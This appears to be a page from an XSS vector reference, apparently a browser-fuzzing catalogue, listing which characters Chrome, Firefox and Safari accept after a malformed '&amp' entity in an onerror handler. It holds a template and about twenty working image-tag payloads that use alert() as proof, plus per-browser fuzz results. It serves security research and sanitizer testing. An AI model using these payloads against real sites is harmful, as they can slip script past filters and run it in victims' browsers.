Characters allowed after malformed entities

Safari logo 31
Chrome logo 31
Firefox logo 31

This vector shows what characters are allowed after a malformed names entity.

Created by: hackvertor

Created on: Monday, July 1, 2024 at 9:26:08 PM

Updated on: Tuesday, December 10, 2024 at 5:11:56 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<img src=data: onerror="1&amp$[chr]log($[i])">
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<img src=data: onerror="1&amp-alert(45)">
<img src=data: onerror="1&amp
alert(10)">
<img src=data: onerror="1&amp alert(8201)">
<img src=data: onerror="1&amp alert(8192)">
<img src=data: onerror="1&amp alert(8195)">
<img src=data: onerror="1&amp alert(8199)">
<img src=data: onerror="1&amp	alert(9)">
<img src=data: onerror="1&amp alert(8200)">
<img src=data: onerror="1&amp alert(8196)">
<img src=data: onerror="1&amp alert(32)">
<img src=data: onerror="1&ampalert(11)">
<img src=data: onerror="1&amp alert(5760)">
<img src=data: onerror="1&amp alert(8198)">
<img src=data: onerror="1&amp&alert(38)">
<img src=data: onerror="1&amp alert(8239)">
<img src=data: onerror="1&amp alert(160)">
<img src=data: onerror="1&amp alert(8202)">
<img src=data: onerror="1&ampalert(65279)">
<img src=data: onerror="1&amp~alert(126)">
<img src=data: onerror="1&ampalert(12)">

Fuzz results

Safari logo
Safari 17.5 mobile iOS 17.5.1

Updated

Mon Jul 01 2024
Found 31 results
Loading...
Chrome logo
Chrome 126.0.0.0 desktop macOS 10.15.7

Updated

Tue Jul 02 2024
Found 31 results
Loading...
Firefox logo
Firefox 127.0 desktop macOS 10.15

Updated

Tue Jul 02 2024
Found 31 results
Loading...
Safari logo
Safari 18.0 desktop macOS 10.15.7

Updated

Tue Jul 02 2024
Found 31 results
Loading...